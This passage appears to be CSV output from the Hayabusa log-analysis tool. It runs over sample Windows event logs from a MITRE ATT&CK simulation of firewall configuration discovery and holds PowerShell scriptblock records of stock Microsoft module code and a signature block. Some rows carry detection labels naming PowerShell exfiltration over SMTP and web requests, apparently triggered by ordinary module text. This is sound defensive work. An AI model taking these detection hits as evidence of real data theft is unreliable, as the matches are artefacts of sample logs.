[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssocia",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.598 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.598 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exfil,Powershell Exfiltration Over SMTP,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_send_mailmessage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""1DA87E53-152B-403E-98DC-74D7B4D63D59"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. All rights reserved."" ModuleVersion=""3.1.0.0"" PowerShellVersion=""3.0"" CLRVersion=""4.0"" CmdletsToExport= ""Format-List"", ""Format-Custom"", ""Format-Table"", ""Format-Wide"", ""Out-File"", ""Out-Printer"", ""Out-String"", ""Out-GridView"", ""Get-FormatData"", ""Export-FormatData"", ""ConvertFrom-Json"", ""ConvertTo-Json"", ""Invoke-RestMethod"", ""Invoke-WebRequest"", ""Register-ObjectEvent"", ""Register-EngineEvent"", ""Wait-Event"", ""Get-Event"", ""Remove-Event"", ""Get-EventSubscriber"", ""Unregister-Event"", ""New-Event"", ""Add-Member"", ""Add-Type"", ""Compare-Object"", ""ConvertTo-Html"", ""ConvertFrom-StringData"", ""Export-Csv"", ""Import-Csv"", ""ConvertTo-Csv"", ""ConvertFrom-Csv"", ""Export-Alias"", ""Invoke-Expression"", ""Get-Alias"", ""Get-Culture"", ""Get-Date"", ""Get-Host"", ""Get-Member"", ""Get-Random"", ""Get-UICulture"", ""Get-FileHash"", ""Get-Unique"", ""Export-PSSession"", ""Import-PSSession"", ""Import-Alias"", ""Import-LocalizedData"", ""Select-String"", ""Measure-Object"", ""New-Alias"", ""New-TimeSpan"", ""Read-Host"", ""Set-Alias"", ""Set-Date"", ""Start-Sleep"", ""Tee-Object"", ""Measure-Command"", ""Update-List"", ""Update-TypeData"", ""Update-FormatData"", ""Remove-TypeData"", ""Get-TypeData"", ""Write-Host"", ""Write-Progress"", ""New-Object"", ""Select-Object"", ""Group-Object"", ""Sort-Object"", ""Get-Variable"", ""New-Variable"", ""Set-Variable"", ""Remove-Variable"", ""Clear-Variable"", ""Export-Clixml"", ""Import-Clixml"", ""ConvertTo-Xml"", ""Select-Xml"", ""Write-Debug"", ""Write-Verbose"", ""Write-Warning"", ""Write-Error"", ""Write-Output"", ""Set-PSBreakpoint"", ""Get-PSBreakpoint"", ""Remove-PSBreakpoint"", ""Enable-PSBreakpoint"", ""Disable-PSBreakpoint"", ""Get-PSCallStack"", ""Send-MailMessage"", ""Get-TraceSource"", ""Set-TraceSource"", ""Trace-Command"", ""Show-Command"", ""Unblock-File"" NestedModules=""Microsoft.PowerShell.Commands.Utility.dll"",""Microsoft.PowerShell.Utility.psm1"" HelpInfoURI = 'http://go.microsoft.com/fwlink/?linkid=285758' }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-FileHash { [CmdletBinding(DefaultParameterSetName = ""Path"")] param( [Parameter(Mandatory, ParameterSetName=""Path"", Position = 0)] [System.String[]] $Path, [Parameter(Mandatory, ParameterSetName=""LiteralPath"", ValueFromPipelineByPropertyName = $true)] [Alias(""PSPath"")] [System.String[]] $LiteralPath, [Parameter(Mandatory, ParameterSetName=""Stream"")] [System.IO.Stream] $InputStream, [ValidateSet(""SHA1"", ""SHA256"", ""SHA384"", ""SHA512"", ""MACTripleDES"", ""MD5"", ""RIPEMD160"")] [System.String] $Algorithm=""SHA256"" ) begin { # Construct the strongly-typed crypto object $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm) } process { if($PSCmdlet.ParameterSetName -eq ""Stream"") { GetStreamHash -InputStream $InputStream -RelatedPath $null -Hasher $hasher } else { $pathsToProcess = @() if($PSCmdlet.ParameterSetName -eq ""LiteralPath"") { $pathsToProcess += Resolve-Path -LiteralPath $LiteralPath | Foreach-Object ProviderPath } if($PSCmdlet.ParameterSetName -eq ""Path"") { $pathsToProcess += Resolve-Path $Path | Foreach-Object ProviderPath } foreach($filePath in $pathsToProcess) { if(Test-Path -LiteralPath $filePath -PathType Container) { continue } try { # Read the file specified in $FilePath as a Byte array [system.io.stream]$stream = [system.io.file]::OpenRead($filePath) GetStreamHash -InputStream $stream -RelatedPath $filePath -Hasher $hasher } catch [Exception] { $errorMessage = [Microsoft.PowerShell.Commands.UtilityResources]::FileReadError -f $FilePath, $_ Write-Error -Message $errorMessage -Category ReadError -ErrorId ""FileReadError"" -TargetObject $FilePath return } finally { if($stream) { $stream.Close() } } } } } } function GetStreamHash { param( [System.IO.Stream] $InputStream, [System.String] $RelatedPath, [System.Security.Cryptography.HashAlgorithm] $Hasher) # Compute file-hash using the crypto object [Byte[]] $computedHash = $Hasher.ComputeHash($InputStream) [string] $hash = [BitConverter]::ToString($computedHash) -replace '-','' if ($RelatedPath -eq $null) { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } else { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash Path = $RelatedPath } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } } # SIG # Begin signature block # MIIavwYJKoZIhvcNAQcCoIIasDCCGqwCAQExCzAJBgUrDgMCGgUAMGkGCisGAQQB # gjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNR # AgEAAgEAAgEAAgEAAgEAMCEwCQYFKw4DAhoFAAQU4uPI6oMmN45jE4gtibs9Byjz # 1dCgghWCMIIEwzCCA6ugAwIBAgITMwAAADUo7mFTkiJhkQAAAAAANTANBgkqhkiG # 9w0BAQUFADB3MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4G # A1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSEw # HwYDVQQDExhNaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EwHhcNMTMwMzI3MjAwODI2 # WhcNMTQwNjI3MjAwODI2WjCBszELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjENMAsGA1UECxMETU9QUjEnMCUGA1UECxMebkNpcGhlciBEU0UgRVNO # OjMxQzUtMzBCQS03QzkxMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAm9vWEfGEH1m0 # kUedzTgvsolxQaJbPc6WtX2a9wqAK0ICg8R8//f26pcftWw4XkuVVOjsk9K5TeT3 # KyaHr7vrG+hNHCFDF/igM5qRsYFNOIEkUwKxdnlaLqz7y4xcXTubXKU7NoBsI3S2 # xnffQyfNOpmouBP65aqjt8VzhFbsjsFIMwGJMa8nNq07LQDicQQxvva3dLFnP1rl # hLUBJpB4iYAlPj5CHFJKZCcCaM6iBr7QtT5EF4CZiImcwLkP1fI5lcM1FLsJEEW5 # 6m5frIDLh3xFZAImCU+adqVmvhBJKKO57P+y+mFb+WPqknL1SurKOz0TkYw7/TnW # STwC7nod4QIDAQABo4IBCTCCAQUwHQYDVR0OBBYEFLkUVdsQ7WBr1Q2DdA3Oc3OV # ImUcMB8GA1UdIwQYMBaAFCM0+NlSRnAK7UD7dvuzK7DDNbMPMFQGA1UdHwRNMEsw # SaBHoEWGQ2h0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3Rz # L01pY3Jvc29mdFRpbWVTdGFtcFBDQS5jcmwwWAYIKwYBBQUHAQEETDBKMEgGCCsG # AQUFBzAChjxodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY3Jv # c29mdFRpbWVTdGFtcFBDQS5jcnQwEwYDVR0lBAwwCgYIKwYBBQUHAwgwDQYJKoZI # hvcNAQEFBQADggEBAJaVlxhREadlaCDXqFbP6lUQVKjx5/JsbwouUz8YgQjPN/Y1 # ymKKoJBe4u9HzqrHBZj93hq26BKkmrnKpWKvyOY+ODJcA9PzaPlgnMeyJdykTGuP # BsvYtsFYIn6E1Wu56PE+L3n28vpsaOjKAl8BvrGgbPmPRbm4SwZfxJSO9+3r1yFa # uFZbeGfcQAl82pKj27zQmh2O5snaz1Iff7+W3owsX20ilqNJ+acaIl7/6cpyJUC4 # 87hUHlrIV1CyiyLmEOyt7aUQlFLU7VtXgskXVPZ03lGrVDTglUY63lUwGhdwL5f2 # CgYipvqCjochior3gYxSN0w6jQRbNcvzG4N1vl0wggTsMIID1KADAgECAhMzAAAA # sBGvCovQO5/dAAEAAACwMA0GCSqGSIb3DQEBBQUAMHkxCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xIzAhBgNVBAMTGk1pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBMB4XDTEzMDEyNDIyMzMzOVoXDTE0MDQyNDIyMzMzOVowgYMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xDTALBgNVBAsTBE1PUFIx # HjAcBgNVBAMTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjCCASIwDQYJKoZIhvcNAQEB # BQADggEPADCCAQoCggEBAOivXKIgDfgofLwFe3+t7ut2rChTPzrbQH2zjjPmVz+l # URU0VKXPtIupP6g34S1Q7TUWTu9NetsTdoiwLPBZXKnr4dcpdeQbhSeb8/gtnkE2 # KwtA+747urlcdZMWUkvKM8U3sPPrfqj1QRVcCGUdITfwLLoiCxCxEJ13IoWEfE+5 # G5Cw9aP+i/QMmk6g9ckKIeKq4wE2R/0vgmqBA/WpNdyUV537S9QOgts4jxL+49Z6 # dIhk4WLEJS4qrp0YHw4etsKvJLQOULzeHJNcSaZ5tbbbzvlweygBhLgqKc+/qQUF # 4eAPcU39rVwjgynrx8VKyOgnhNN+xkMLlQAFsU9lccUCAwEAAaOCAWAwggFcMBMG # A1UdJQQMMAoGCCsGAQUFBwMDMB0GA1UdDgQWBBRZcaZaM03amAeA/4Qevof5cjJB # 8jBRBgNVHREESjBIpEYwRDENMAsGA1UECxMETU9QUjEzMDEGA1UEBRMqMzE1OTUr # NGZhZjBiNzEtYWQzNy00YWEzLWE2NzEtNzZiYzA1MjM0NGFkMB8GA1UdIwQYMBaA # FMsR6MrStBZYAck3LjMWFrlMmgofMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9j # cmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY0NvZFNpZ1BDQV8w # OC0zMS0yMDEwLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6 # Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljQ29kU2lnUENBXzA4LTMx # LTIwMTAuY3J0MA0GCSqGSIb3DQEBBQUAA4IBAQAx124qElczgdWdxuv5OtRETQie # 7l7falu3ec8CnLx2aJ6QoZwLw3+ijPFNupU5+w3g4Zv0XSQPG42IFTp8263Os8ls # ujksRX0kEVQmMA0N/0fqAwfl5GZdLHudHakQ+hywdPJPaWueqSSE2u2WoN9zpO9q # GqxLYp7xfMAUf0jNTbJE+fA8k21C2Oh85hegm2hoCSj5ApfvEQO6Z1Ktwemzc6bS # Y81K4j7k8079/6HguwITO10g3lU/o66QQDE4dSheBKlGbeb1enlAvR/N6EXVruJd # PvV1x+ZmY2DM1ZqEh40kMPfvNNBjHbFCZ0oOS786Du+2lTqnOOQlkgimiGaCMIIF # vDCCA6SgAwIBAgIKYTMmGgAAAAAAMTANBgkqhkiG9w0BAQUFADBfMRMwEQYKCZIm # 